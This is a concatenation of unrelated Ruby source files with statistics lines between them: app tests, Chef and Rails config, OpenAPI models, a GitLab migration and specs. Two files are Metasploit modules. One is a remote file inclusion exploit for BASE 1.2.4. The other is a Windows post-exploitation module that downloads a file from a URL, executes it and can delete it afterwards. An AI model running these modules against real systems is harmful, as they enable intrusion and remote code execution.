iucn_category_1 = FactoryGirl.create(:iucn_category, name: 'Ib') iucn_category_2 = FactoryGirl.create(:iucn_category, name: 'V') invalid_iucn_category = FactoryGirl.create(:iucn_category, name: 'Pepe') country_1 = FactoryGirl.create(:country) country_2 = FactoryGirl.create(:country) country_3 = FactoryGirl.create(:country) FactoryGirl.create(:protected_area, iucn_category: iucn_category_1, countries: [country_1] ) FactoryGirl.create(:protected_area, iucn_category: iucn_category_2, countries: [country_1]) FactoryGirl.create(:protected_area, iucn_category: invalid_iucn_category, countries: [country_2]) FactoryGirl.create(:protected_area, iucn_category: iucn_category_2, countries: [country_3]) assert_equal 2, country_1.protected_areas_with_iucn_categories.count end test '#data_providers returns all countries that provide PA data' do country_1 = FactoryGirl.create(:country) country_2 = FactoryGirl.create(:country) FactoryGirl.create(:country) FactoryGirl.create(:protected_area, countries: [country_1]) FactoryGirl.create(:protected_area, countries: [country_2]) assert_equal 2, Country.data_providers.count end test '#random_protected_areas, given an integer, returns the given number of random pas' do country = 
FactoryGirl.create(:country) country_pas = 2.times.map{ FactoryGirl.create(:protected_area, countries: [country]) } 2.times{ FactoryGirl.create(:protected_area) } random_pas = country.random_protected_areas 2 assert_same_elements country_pas, random_pas end test '#protected_areas_per_designation returns groups of pa counts per designation' do designation_1 = FactoryGirl.create(:designation) designation_2 = FactoryGirl.create(:designation) country = FactoryGirl.create(:country) expected_groups = [{ 'designation_id' => designation_1.id, 'designation_name' => designation_1.name, 'count' => 2 }, { 'designation_id' => designation_2.id, 'designation_name' => designation_2.name, 'count' => 3 }] 2.times { FactoryGirl.create(:protected_area, countries: [country], designation: designation_1) } 3.times { FactoryGirl.create(:protected_area, countries: [country], designation: designation_2) } assert_same_elements expected_groups, country.protected_areas_per_designation.to_a end test '#protected_areas_per_iucn_category returns groups of pa counts per iucn_category' do iucn_category_1 = FactoryGirl.create(:iucn_category, name: 'Ib') iucn_category_2 = FactoryGirl.create(:iucn_category, name: 'V') country = FactoryGirl.create(:country) expected_groups = [{ 'iucn_category_id' => iucn_category_1.id, 'iucn_category_name' => iucn_category_1.name, 'count' => 2, 'percentage' => '40.00' }, { 'iucn_category_id' => iucn_category_2.id, 'iucn_category_name' => iucn_category_2.name, 'count' => 3, 'percentage' => '60.00' }] 2.times { FactoryGirl.create(:protected_area, countries: [country], iucn_category: iucn_category_1) } 3.times { FactoryGirl.create(:protected_area, countries: [country], iucn_category: iucn_category_2) } assert_same_elements expected_groups, country.protected_areas_per_iucn_category.to_a end test '#protected_areas_per_governance returns groups of pa counts per governance' do governance_1 = FactoryGirl.create(:governance, name: 'Regional') governance_2 = FactoryGirl.create(:governance, name: 'International') country = FactoryGirl.create(:country) expected_groups = [{ 'governance_id' => governance_1.id, 'governance_name' => governance_1.name, 'governance_type' => nil, 'count' => 2, 'percentage' => '40.00' }, { 'governance_id' => governance_2.id, 'governance_name' => governance_2.name, 'governance_type' => nil, 'count' => 3, 'percentage' => '60.00' }] 2.times { FactoryGirl.create(:protected_area, countries: [country], governance: governance_1) } 3.times { FactoryGirl.create(:protected_area, countries: [country], governance: governance_2) } assert_same_elements expected_groups, country.protected_areas_per_governance.to_a end end
39.476744
105
0.723859
b98cde2df610d304b3ffd9db754ea15717b7ea26
651
include_recipe 'download-setups-s3::auth_files'

directory node['download_setups_s3']['pro']['local_path'] do
  recursive true
  action :create
end

aws_s3_file node['download_setups_s3']['pro']['src_path'] do
  bucket node['download_setups_s3']['bucket']
  region node['download_setups_s3']['region']
  remote_path node['download_setups_s3']['pro']['remote_path']
end

if node['platform'] == 'windows'
  seven_zip_archive 'extract pro setup' do
    path node['download_setups_s3']['pro']['local_path']
    source node['download_setups_s3']['pro']['src_path']
    action :extract
    not_if { ::File.exist?(node['arcgis']['pro']['setup']) }
  end
end
29.590909
62
0.711214
5dc533ba23a7d5bec61069c91c206915c2b114ac
1,952
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::PHPInclude

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'BASE base_qry_common Remote File Include.',
      'Description' => %q{
        This module exploits a remote file inclusion vulnerability in the
        base_qry_common.php file in BASE 1.2.4 and earlier.
      },
      'Author' => [ 'MC' ],
      'License' => MSF_LICENSE,
      'Version' => '$Revision$',
      'References' =>
        [
          [ 'CVE', '2006-2685' ],
          [ 'OSVDB', '49366'],
          [ 'BID', '18298' ],
        ],
      'Privileged' => false,
      'Payload' =>
        {
          'DisableNops' => true,
          'Compat' =>
            {
              'ConnectionType' => 'find',
            },
          'Space' => 32768,
        },
      'Platform' => 'php',
      'Arch' => ARCH_PHP,
      'Targets' => [[ 'Automatic', { }]],
      'DisclosureDate' => 'Jun 14 2008',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/base/base_qry_common.php?BASE_path=!URL!"]),
      ], self.class)
  end

  def php_exploit
    timeout = 0.01

    uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))

    print_status("Trying uri #{uri}")

    response = send_request_raw(
      {
        'global' => true,
        'uri' => uri,
      }, timeout)

    if response and response.code != 200
      print_error("Server returned non-200 status code (#{response.code})")
    end

    handler
  end
end
25.025641
148
0.599385
f82a3b01706bf286f36bf6d3f82c54c858da04e2
29
module Admins::TopHelper
end
9.666667
24
0.827586
6aa03d52fdd3101b022f16ae44cd99b621784787
491
require 'scorched'
require_relative './common'

class App < Scorched::Controller
  get '/' do
    render :index
  end

  controller '/artist/:id' do
    before do
      @artist = Artist[captures[:id]]
      check_access(@artist)
    end

    get '/' do
      render :artist
    end

    post '/' do
      @artist.update(request.POST)
    end

    delete '/' do
      @artist.destroy
    end

    after method!: 'GET' do
      redirect "?#{request.request_method}"
    end
  end
end

run App
14.441176
43
0.588595
ffc9ad81a596834a42491401b099ab0e99234248
1,235
=begin
#Ory APIs

#Documentation for all public and administrative Ory APIs. Administrative APIs can only be accessed with a valid Personal Access Token. Public APIs are mostly used in browsers.

The version of the OpenAPI document: v0.0.1-alpha.30
Contact: [email protected]
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 5.2.1

=end

require 'date'
require 'time'

module OryClient
  class SelfServiceVerificationFlowState
    CHOOSE_METHOD = "choose_method".freeze
    SENT_EMAIL = "sent_email".freeze
    PASSED_CHALLENGE = "passed_challenge".freeze

    # Builds the enum from string
    # @param [String] The enum value in the form of the string
    # @return [String] The enum value
    def self.build_from_hash(value)
      new.build_from_hash(value)
    end

    # Builds the enum from string
    # @param [String] The enum value in the form of the string
    # @return [String] The enum value
    def build_from_hash(value)
      constantValues = SelfServiceVerificationFlowState.constants.select { |c| SelfServiceVerificationFlowState::const_get(c) == value }
      raise "Invalid ENUM value #{value} for class #SelfServiceVerificationFlowState" if constantValues.empty?
      value
    end
  end
end
31.666667
177
0.74413
91a0db08d5ba778d88bcda7bd78ba64a9697add6
7,228
# frozen_string_literal: true module Gitlab module BackgroundMigration module ProjectNamespaces # Back-fill project namespaces for projects that do not yet have a namespace. # # rubocop: disable Metrics/ClassLength class BackfillProjectNamespaces attr_accessor :project_ids, :sub_batch_size SUB_BATCH_SIZE = 25 PROJECT_NAMESPACE_STI_NAME = 'Project' IsolatedModels = ::Gitlab::BackgroundMigration::ProjectNamespaces::Models def perform(start_id, end_id, migration_table_name, migration_column_name, sub_batch_size, pause_ms, namespace_id, migration_type = 'up') @sub_batch_size = sub_batch_size || SUB_BATCH_SIZE load_project_ids(start_id, end_id, namespace_id) case migration_type when 'up' backfill_project_namespaces mark_job_as_succeeded(start_id, end_id, namespace_id, 'up') when 'down' cleanup_backfilled_project_namespaces(namespace_id) mark_job_as_succeeded(start_id, end_id, namespace_id, 'down') else raise "Unknown migration type" end end def backfill_project_namespaces project_ids.each_slice(sub_batch_size) do |project_ids| # cleanup gin indexes on namespaces table cleanup_gin_index('namespaces') # cleanup gin indexes on projects table cleanup_gin_index('projects') # We need to lock these project records for the period when we create project namespaces # and link them to projects so that if a project is modified in the time between creating # project namespaces `batch_insert_namespaces` and linking them to projects `batch_update_projects` # we do not get them out of sync. # # see https://gitlab.com/gitlab-org/gitlab/-/merge_requests/72527#note_730679469 Project.transaction do Project.where(id: project_ids).select(:id).lock!('FOR UPDATE').load batch_insert_namespaces(project_ids) batch_update_projects(project_ids) batch_update_project_namespaces_traversal_ids(project_ids) end end end def cleanup_gin_index(table_name) index_names = ApplicationRecord.connection.select_values("select indexname::text from pg_indexes where tablename = '#{table_name}' and indexdef ilike '%gin%'") index_names.each do |index_name| ApplicationRecord.connection.execute("select gin_clean_pending_list('#{index_name}')") end end private def cleanup_backfilled_project_namespaces(namespace_id) project_ids.each_slice(sub_batch_size) do |project_ids| # IMPORTANT: first nullify project_namespace_id in projects table to avoid removing projects when records # from namespaces are deleted due to FK/triggers nullify_project_namespaces_in_projects(project_ids) delete_project_namespace_records(project_ids) end end def batch_insert_namespaces(project_ids) projects = IsolatedModels::Project.where(id: project_ids) .select("projects.id, projects.name, projects.path, projects.namespace_id, projects.visibility_level, shared_runners_enabled, '#{PROJECT_NAMESPACE_STI_NAME}', now(), now()") ApplicationRecord.connection.execute <<~SQL INSERT INTO namespaces (tmp_project_id, name, path, parent_id, visibility_level, shared_runners_enabled, type, created_at, updated_at) #{projects.to_sql} ON CONFLICT DO NOTHING; SQL end def batch_update_projects(project_ids) projects = IsolatedModels::Project.where(id: project_ids) .joins("INNER JOIN namespaces ON projects.id = namespaces.tmp_project_id") .select("namespaces.id, namespaces.tmp_project_id") ApplicationRecord.connection.execute <<~SQL WITH cte(project_namespace_id, project_id) AS #{::Gitlab::Database::AsWithMaterialized.materialized_if_supported} ( #{projects.to_sql} ) UPDATE projects SET project_namespace_id = cte.project_namespace_id FROM cte WHERE id = cte.project_id AND 
projects.project_namespace_id IS DISTINCT FROM cte.project_namespace_id SQL end def batch_update_project_namespaces_traversal_ids(project_ids) namespaces = Namespace.where(tmp_project_id: project_ids) .joins("INNER JOIN namespaces n2 ON namespaces.parent_id = n2.id") .select("namespaces.id as project_namespace_id, n2.traversal_ids") ApplicationRecord.connection.execute <<~SQL UPDATE namespaces SET traversal_ids = array_append(project_namespaces.traversal_ids, project_namespaces.project_namespace_id) FROM (#{namespaces.to_sql}) as project_namespaces(project_namespace_id, traversal_ids) WHERE id = project_namespaces.project_namespace_id SQL end def nullify_project_namespaces_in_projects(project_ids) IsolatedModels::Project.where(id: project_ids).update_all(project_namespace_id: nil) end def delete_project_namespace_records(project_ids) # keep the deletes a 10x smaller batch as deletes seem to be much more expensive delete_batch_size = (sub_batch_size / 10).to_i + 1 project_ids.each_slice(delete_batch_size) do |p_ids| IsolatedModels::Namespace.where(type: PROJECT_NAMESPACE_STI_NAME).where(tmp_project_id: p_ids).delete_all end end def load_project_ids(start_id, end_id, namespace_id) projects = IsolatedModels::Project.arel_table relation = IsolatedModels::Project.where(projects[:id].between(start_id..end_id)) relation = relation.where(projects[:namespace_id].in(Arel::Nodes::SqlLiteral.new(self.class.hierarchy_cte(namespace_id)))) if namespace_id @project_ids = relation.pluck(:id) end def mark_job_as_succeeded(*arguments) ::Gitlab::Database::BackgroundMigrationJob.mark_all_as_succeeded('BackfillProjectNamespaces', arguments) end def self.hierarchy_cte(root_namespace_id) <<-SQL WITH RECURSIVE "base_and_descendants" AS ( ( SELECT "namespaces"."id" FROM "namespaces" WHERE "namespaces"."type" = 'Group' AND "namespaces"."id" = #{root_namespace_id.to_i} ) UNION ( SELECT "namespaces"."id" FROM "namespaces", "base_and_descendants" WHERE "namespaces"."type" = 'Group' AND "namespaces"."parent_id" = "base_and_descendants"."id" ) ) SELECT "id" FROM "base_and_descendants" AS "namespaces" SQL end end # rubocop: enable Metrics/ClassLength end end end
44.073171
185
0.653154
180db50bbfebc69f97190f43b0161359d3ffcee3
1,530
require_relative 'boot'

require "rails"
# Pick the frameworks you want:
require "active_model/railtie"
require "active_job/railtie"
require "active_record/railtie"
require "active_storage/engine"
require "action_controller/railtie"
require "action_mailer/railtie"
require "action_mailbox/engine"
require "action_text/engine"
require "action_view/railtie"
require "action_cable/engine"
# require "sprockets/railtie"
require "rails/test_unit/railtie"

# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)

module Slots
  class Application < Rails::Application
    # Initialize configuration defaults for originally generated Rails version.
    config.load_defaults 6.0

    # Settings in config/environments/* take precedence over those specified here.
    # Application configuration can go into files in config/initializers
    # -- all .rb files in that directory are automatically loaded after loading
    # the framework and any gems in your application.

    # Only loads a smaller set of middleware suitable for API only apps.
    # Middleware like session, flash, cookies can be added back manually.
    # Skip views, helpers and assets when generating a new resource.
    config.api_only = true

    # CORS Related Items
    config.middleware.insert_before 0, Rack::Cors do
      allow do
        origins '*'
        resource('*', headers: :any, methods: [:get, :patch, :delete, :post, :options])
      end
    end
  end
end
32.553191
87
0.745098
182d154e531c2817f2a93051a3244623a0278eeb
1,449
module RSpec
  module Matchers
    module BuiltIn
      class BeWithin
        include MatchAliases

        def initialize(delta)
          @delta = delta
        end

        def matches?(actual)
          @actual = actual
          raise needs_expected unless defined? @expected
          raise needs_subtractable unless @actual.respond_to? :-
          (@actual - @expected).abs <= @tolerance
        end

        def of(expected)
          @expected = expected
          @tolerance = @delta
          @unit = ''
          self
        end

        def percent_of(expected)
          @expected = expected
          @tolerance = @delta * @expected.abs / 100.0
          @unit = '%'
          self
        end

        def failure_message_for_should
          "expected #{@actual} to #{description}"
        end

        def failure_message_for_should_not
          "expected #{@actual} not to #{description}"
        end

        def description
          "be within #{@delta}#{@unit} of #{@expected}"
        end

        # @private
        def supports_block_expectations?
          false
        end

        private

        def needs_subtractable
          ArgumentError.new "The actual value (#{@actual.inspect}) must respond to `-`"
        end

        def needs_expected
          ArgumentError.new "You must set an expected value using #of: be_within(#{@delta}).of(expected_value)"
        end
      end
    end
  end
end
23.370968
111
0.541753
1a30c847846d4ba516d459fd807ccc725181631a
1,475
# Copyright 2011-2012 Rice University. Licensed under the Affero General Public
# License version 3 or later.  See the COPYRIGHT file for details.

require 'test_helper'

class ConsentFormsControllerTest < ActionController::TestCase
  setup do
    @consent_form = consent_forms(:one)
  end

  test "should get index" do
    get :index
    assert_response :success
    assert_not_nil assigns(:consent_forms)
  end

  test "should get new" do
    get :new
    assert_response :success
  end

  test "should create consent_form" do
    assert_difference('ConsentForm.count') do
      post :create, consent_form: { esignature_required: @consent_form.esignature_required, html: @consent_form.html, name: @consent_form.name }
    end

    assert_redirected_to consent_form_path(assigns(:consent_form))
  end

  test "should show consent_form" do
    get :show, id: @consent_form
    assert_response :success
  end

  test "should get edit" do
    get :edit, id: @consent_form
    assert_response :success
  end

  test "should update consent_form" do
    put :update, id: @consent_form, consent_form: { esignature_required: @consent_form.esignature_required, html: @consent_form.html, name: @consent_form.name }
    assert_redirected_to consent_form_path(assigns(:consent_form))
  end

  test "should destroy consent_form" do
    assert_difference('ConsentForm.count', -1) do
      delete :destroy, id: @consent_form
    end

    assert_redirected_to consent_forms_path
  end
end
27.830189
160
0.743729
ffb6da34200b4bbc3ef7a41f50175b280c0ccaee
313
require "afmotion"

unless defined?(Motion::Project::Config)
  raise "This file must be required within a RubyMotion project Rakefile."
end

lib_dir_path = File.dirname(File.expand_path(__FILE__))
Motion::Project::App.setup do |app|
  app.files.unshift(Dir.glob(File.join(lib_dir_path, "motion-giphy/*.rb")))
end
28.454545
75
0.763578
1820299a714bb4888edb41422185f51aa27efc6d
328
require './config/environment'

if defined?(ActiveRecord::Migrator) && ActiveRecord::Migrator.needs_migration?
  raise 'Migrations are pending. Run `rake db:migrate` to resolve the issue.'
end

use Rack::MethodOverride
use Sass::Plugin::Rack
use UsersController
use RoomsController
use ItemsController
run ApplicationController
25.230769
78
0.807927
ffe0cdf2e564438e76bfb2e9b7bd48ccd917d5c5
4,168
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Post include Msf::Post::File def initialize(info = {}) super( update_info( info, 'Name' => "Windows Manage Download and/or Execute", 'Description' => %q{ This module will download a file by importing urlmon via railgun. The user may also choose to execute the file with arguments via exec_string. }, 'License' => MSF_LICENSE, 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => ['RageLtMan <rageltman[at]sempervictus>'], 'Compat' => { 'Meterpreter' => { 'Commands' => %w[ stdapi_fs_delete_file stdapi_fs_file_expand_path stdapi_fs_stat stdapi_railgun_api stdapi_sys_config_getenv ] } } ) ) register_options( [ OptString.new('URL', [true, 'Full URL of file to download' ]), OptString.new('DOWNLOAD_PATH', [false, 'Full path for downloaded file' ]), OptString.new('FILENAME', [false, 'Name for downloaded file' ]), OptBool.new('OUTPUT', [true, 'Show execution output', true ]), OptBool.new('EXECUTE', [true, 'Execute file after completion', false ]), ] ) register_advanced_options( [ OptString.new('EXEC_STRING', [false, 'Execution parameters when run from download directory' ]), OptInt.new('EXEC_TIMEOUT', [true, 'Execution timeout', 60 ]), OptBool.new('DELETE', [true, 'Delete file after execution', false ]), ] ) end # Check to see if our dll is loaded, load and configure if not def add_railgun_urlmon if client.railgun.libraries.find_all { |d| d.first == 'urlmon' }.empty? session.railgun.add_dll('urlmon', 'urlmon') session.railgun.add_function( 'urlmon', 'URLDownloadToFileW', 'DWORD', [ ['PBLOB', 'pCaller', 'in'], ['PWCHAR', 'szURL', 'in'], ['PWCHAR', 'szFileName', 'in'], ['DWORD', 'dwReserved', 'in'], ['PBLOB', 'lpfnCB', 'inout'] ] ) vprint_good("urlmon loaded and configured") else vprint_status("urlmon already loaded") end end def run # Make sure we meet the requirements before running the script, note no need to return # unless error return 0 if session.type != "meterpreter" # get time strtime = Time.now # check/set vars url = datastore["URL"] filename = datastore["FILENAME"] || url.split('/').last path = datastore['DOWNLOAD_PATH'] if path.blank? path = session.sys.config.getenv('TEMP') else path = session.fs.file.expand_path(path) end outpath = path + '\\' + filename exec = datastore['EXECUTE'] exec_string = datastore['EXEC_STRING'] output = datastore['OUTPUT'] remove = datastore['DELETE'] # set up railgun add_railgun_urlmon # get our file vprint_status("Downloading #{url} to #{outpath}") client.railgun.urlmon.URLDownloadToFileW(nil, url, outpath, 0, nil) # check our results begin out = session.fs.file.stat(outpath) print_status("#{out.stathash['st_size']} bytes downloaded to #{outpath} in #{(Time.now - strtime).to_i} seconds ") rescue print_error("File not found. The download probably failed") return end # Execute file upon request if exec begin cmd = "\"#{outpath}\" #{exec_string}" print_status("Executing file: #{cmd}") res = cmd_exec(cmd, nil, datastore['EXEC_TIMEOUT']) print_good(res) if output and not res.empty? rescue ::Exception => e print_error("Unable to execute: #{e.message}") end end # remove file if needed if remove begin print_status("Deleting #{outpath}") session.fs.file.rm(outpath) rescue ::Exception => e print_error("Unable to remove file: #{e.message}") end end end end
29.560284
120
0.595489
f7b01dde15ec5b5bcc00f60052355278775e7b60
7,894
=begin #Tatum API ## Authentication <!-- ReDoc-Inject: <security-definitions> --> OpenAPI spec version: 3.9.0 Generated by: https://github.com/swagger-api/swagger-codegen.git Swagger Codegen version: 3.0.31 =end require 'date' module Tatum class FlowAccountKeys # Index of the public key. attr_accessor :index attr_accessor :public_key # Type of signature algorithm. 2 - ECDSA_secp256k1 attr_accessor :sign_algo # Type of hash algo. 3 - SHA3_256 attr_accessor :hash_algo # Number of outgoing transactions for this public key. attr_accessor :sequence_number attr_accessor :revoked # Weight of the key. 1000 means single signature necessary. attr_accessor :weight # Attribute mapping from ruby-style variable name to JSON key. def self.attribute_map { :'index' => :'index', :'public_key' => :'publicKey', :'sign_algo' => :'signAlgo', :'hash_algo' => :'hashAlgo', :'sequence_number' => :'sequenceNumber', :'revoked' => :'revoked', :'weight' => :'weight' } end # Attribute type mapping. def self.openapi_types { :'index' => :'Object', :'public_key' => :'Object', :'sign_algo' => :'Object', :'hash_algo' => :'Object', :'sequence_number' => :'Object', :'revoked' => :'Object', :'weight' => :'Object' } end # List of attributes with nullable: true def self.openapi_nullable Set.new([ ]) end # Initializes the object # @param [Hash] attributes Model attributes in the form of hash def initialize(attributes = {}) if (!attributes.is_a?(Hash)) fail ArgumentError, "The input argument (attributes) must be a hash in `Tatum::FlowAccountKeys` initialize method" end # check to see if the attribute exists and convert string to symbol for hash key attributes = attributes.each_with_object({}) { |(k, v), h| if (!self.class.attribute_map.key?(k.to_sym)) fail ArgumentError, "`#{k}` is not a valid attribute in `Tatum::FlowAccountKeys`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect end h[k.to_sym] = v } if attributes.key?(:'index') self.index = attributes[:'index'] end if attributes.key?(:'public_key') self.public_key = attributes[:'public_key'] end if attributes.key?(:'sign_algo') self.sign_algo = attributes[:'sign_algo'] end if attributes.key?(:'hash_algo') self.hash_algo = attributes[:'hash_algo'] end if attributes.key?(:'sequence_number') self.sequence_number = attributes[:'sequence_number'] end if attributes.key?(:'revoked') self.revoked = attributes[:'revoked'] end if attributes.key?(:'weight') self.weight = attributes[:'weight'] end end # Show invalid properties with the reasons. Usually used together with valid? # @return Array for valid properties with the reasons def list_invalid_properties invalid_properties = Array.new invalid_properties end # Check to see if the all the properties in the model are valid # @return true if the model is valid def valid? true end # Checks equality by comparing each attribute. # @param [Object] Object to be compared def ==(o) return true if self.equal?(o) self.class == o.class && index == o.index && public_key == o.public_key && sign_algo == o.sign_algo && hash_algo == o.hash_algo && sequence_number == o.sequence_number && revoked == o.revoked && weight == o.weight end # @see the `==` method # @param [Object] Object to be compared def eql?(o) self == o end # Calculates hash code according to all attributes. 
# @return [Integer] Hash code def hash [index, public_key, sign_algo, hash_algo, sequence_number, revoked, weight].hash end # Builds the object from hash # @param [Hash] attributes Model attributes in the form of hash # @return [Object] Returns the model itself def self.build_from_hash(attributes) new.build_from_hash(attributes) end # Builds the object from hash # @param [Hash] attributes Model attributes in the form of hash # @return [Object] Returns the model itself def build_from_hash(attributes) return nil unless attributes.is_a?(Hash) self.class.openapi_types.each_pair do |key, type| if type =~ /\AArray<(.*)>/i # check to ensure the input is an array given that the attribute # is documented as an array but the input is not if attributes[self.class.attribute_map[key]].is_a?(Array) self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) }) end elsif !attributes[self.class.attribute_map[key]].nil? self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]])) elsif attributes[self.class.attribute_map[key]].nil? && self.class.openapi_nullable.include?(key) self.send("#{key}=", nil) end end self end # Deserializes the data based on type # @param string type Data type # @param string value Value to be deserialized # @return [Object] Deserialized data def _deserialize(type, value) case type.to_sym when :DateTime DateTime.parse(value) when :Date Date.parse(value) when :String value.to_s when :Integer value.to_i when :Float value.to_f when :Boolean if value.to_s =~ /\A(true|t|yes|y|1)\z/i true else false end when :Object # generic object (usually a Hash), return directly value when /\AArray<(?<inner_type>.+)>\z/ inner_type = Regexp.last_match[:inner_type] value.map { |v| _deserialize(inner_type, v) } when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/ k_type = Regexp.last_match[:k_type] v_type = Regexp.last_match[:v_type] {}.tap do |hash| value.each do |k, v| hash[_deserialize(k_type, k)] = _deserialize(v_type, v) end end else # model Tatum.const_get(type).build_from_hash(value) end end # Returns the string representation of the object # @return [String] String presentation of the object def to_s to_hash.to_s end # to_body is an alias to to_hash (backward compatibility) # @return [Hash] Returns the object in the form of hash def to_body to_hash end # Returns the object in the form of hash # @return [Hash] Returns the object in the form of hash def to_hash hash = {} self.class.attribute_map.each_pair do |attr, param| value = self.send(attr) if value.nil? is_nullable = self.class.openapi_nullable.include?(attr) next if !is_nullable || (is_nullable && !instance_variable_defined?(:"@#{attr}")) end hash[param] = _to_hash(value) end hash end # Outputs non-array value in the form of hash # For object, use to_hash. Otherwise, just return the value # @param [Object] value Any valid value # @return [Hash] Returns the value in the form of hash def _to_hash(value) if value.is_a?(Array) value.compact.map { |v| _to_hash(v) } elsif value.is_a?(Hash) {}.tap do |hash| value.each { |k, v| hash[k] = _to_hash(v) } end elsif value.respond_to? :to_hash value.to_hash else value end end end end
29.676692
200
0.611224
edf8e1841a990ad1f1cab997dc65737fb37860c6
600
require "dry-transaction"

require "berg/transactions"
require "admin/container"
require "admin/import"

module Admin
  class Transactions < Berg::Transactions
    class StepAdapters < Dry::Transaction::StepAdapters
      class Enqueue
        include Admin::Import("enqueue")

        def call(step, *args, input)
          enqueue.(step.operation_name, *args, input)
          Right(input)
        end
      end

      register :enqueue, Enqueue.new
    end

    configure do |config|
      config.container = Admin::Container
      config.options = {step_adapters: StepAdapters}
    end
  end
end
21.428571
55
0.663333
6a5c7d2749d4bd2ef9bace45b4daa1a021df3aaf
7,269
# frozen_string_literal: true require "spec_helper" RSpec.describe Files::MultiService do subject { described_class.new(project, user, commit_params) } let(:project) { create(:project, :repository) } let(:repository) { project.repository } let(:user) { create(:user) } let(:branch_name) { project.default_branch } let(:original_file_path) { 'files/ruby/popen.rb' } let(:new_file_path) { 'files/ruby/popen.rb' } let(:file_content) { 'New content' } let(:action) { 'update' } let(:commit_message) { 'Update File' } let!(:original_commit_id) do Gitlab::Git::Commit.last_for_path(project.repository, branch_name, original_file_path).sha end let(:default_action) do { action: action, file_path: new_file_path, previous_path: original_file_path, content: file_content, last_commit_id: original_commit_id } end let(:actions) { [default_action] } let(:commit_params) do { commit_message: commit_message, branch_name: branch_name, start_branch: branch_name, actions: actions } end before do project.add_maintainer(user) end describe '#execute' do context 'with a valid action' do it 'returns a hash with the :success status' do results = subject.execute expect(results[:status]).to eq(:success) end end context 'with an invalid action' do let(:action) { 'rename' } it 'returns a hash with the :error status' do results = subject.execute expect(results[:status]).to eq(:error) expect(results[:message]).to match(/Unknown action/) end end describe 'Updating files' do context 'when the file has been previously updated' do before do update_file(original_file_path) end it 'rejects the commit' do results = subject.execute expect(results[:status]).to eq(:error) expect(results[:message]).to match(new_file_path) end end context 'when the file have not been modified' do it 'accepts the commit' do results = subject.execute expect(results[:status]).to eq(:success) end end end describe 'changing execute_filemode of a file' do let(:commit_message) { 'Chmod +x file' } let(:file_path) { original_file_path } let(:default_action) do { action: 'chmod', file_path: file_path, execute_filemode: true } end it 'accepts the commit' do results = subject.execute expect(results[:status]).to eq(:success) end it 'updates the execute_filemode of the file' do expect { subject.execute }.to change { repository.blob_at_branch(branch_name, file_path).mode }.from('100644').to('100755') end context "when the file doesn't exists" do let(:file_path) { 'files/wrong_path.rb' } it 'rejects the commit' do results = subject.execute expect(results[:status]).to eq(:error) expect(results[:message]).to eq("A file with this name doesn't exist") end end end context 'when moving a file' do let(:action) { 'move' } let(:new_file_path) { 'files/ruby/new_popen.rb' } let(:result) { subject.execute } let(:blob) { repository.blob_at_branch(branch_name, new_file_path) } context 'when original file has been updated' do before do update_file(original_file_path) end it 'rejects the commit' do expect(result[:status]).to eq(:error) expect(result[:message]).to match(original_file_path) end end context 'when original file has not been updated' do it 'moves the file' do expect(result[:status]).to eq(:success) expect(blob).to be_present expect(blob.data).to eq(file_content) end context 'when content is nil' do let(:file_content) { nil } it 'moves the existing content untouched' do original_content = repository.blob_at_branch(branch_name, original_file_path).data expect(result[:status]).to eq(:success) expect(blob).to be_present expect(blob.data).to eq(original_content) end end context 
'when content is an empty string' do let(:file_content) { '' } it 'moves the file and empties it' do expect(result[:status]).to eq(:success) expect(blob).not_to be_nil expect(blob.data).to eq('') end end end end context 'when creating a file matching an LFS filter' do let(:action) { 'create' } let(:branch_name) { 'lfs' } let(:new_file_path) { 'test_file.lfs' } before do allow(project).to receive(:lfs_enabled?).and_return(true) end it 'creates an LFS pointer' do subject.execute blob = repository.blob_at('lfs', new_file_path) expect(blob.data).to start_with(Gitlab::Git::LfsPointerFile::VERSION_LINE) end it "creates an LfsObject with the file's content" do subject.execute expect(LfsObject.last.file.read).to eq file_content end context 'with base64 encoded content' do let(:raw_file_content) { 'Raw content' } let(:file_content) { Base64.encode64(raw_file_content) } let(:actions) { [default_action.merge(encoding: 'base64')] } it 'creates an LFS pointer' do subject.execute blob = repository.blob_at('lfs', new_file_path) expect(blob.data).to start_with(Gitlab::Git::LfsPointerFile::VERSION_LINE) end it "creates an LfsObject with the file's content" do subject.execute expect(LfsObject.last.file.read).to eq raw_file_content end end it 'links the LfsObject to the project' do expect do subject.execute end.to change { project.lfs_objects.count }.by(1) end end context 'when file status validation is skipped' do let(:action) { 'create' } let(:new_file_path) { 'files/ruby/new_file.rb' } it 'does not check the last commit' do expect(Gitlab::Git::Commit).not_to receive(:last_for_path) subject.execute end it 'creates the file' do subject.execute blob = project.repository.blob_at_branch(branch_name, new_file_path) expect(blob).to be_present end end context 'when force is set to true and branch already exists' do let(:commit_params) do { commit_message: commit_message, branch_name: 'feature', start_branch: 'master', actions: actions, force: true } end it 'is still a success' do expect(subject.execute[:status]).to eq(:success) end end end def update_file(path) params = { file_path: path, start_branch: branch_name, branch_name: branch_name, commit_message: 'Update file', file_content: 'New content' } Files::UpdateService.new(project, user, params).execute end end
26.922222
131
0.615628
1d9c2261ea3747f4f37338a6a69e598f005e5383
3,737
